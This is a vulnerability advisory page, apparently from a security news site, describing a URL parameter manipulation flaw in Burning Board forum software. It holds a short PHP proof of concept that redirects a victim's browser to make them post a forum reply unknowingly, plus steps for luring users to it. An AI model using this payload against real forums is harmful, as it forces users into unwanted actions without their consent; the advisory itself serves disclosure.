• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Burning Board URL Parameter Manipulation Vulnerability

The following example was submitted:

1. Create a script exploit.php

exploit.php // with php U can dynamicaly redirect to the same treads & boardid (parsing $HTTP_REFERER)
<?php
header ("Location:
http://localhost/wbboard/reply.php?threadid=7&boardid=58&action=send&subject=check%20this%20out&message=test[IMG]http://localhost/~seazon/art/
eros/236.jpg[/IMG]&signature=1"); /* Redirect browser*/
?>


2.Register in forum
3.Send a message like this
"Hey, I know how to exploit this forum [URL]http://host.com/exploit.php[/URL]"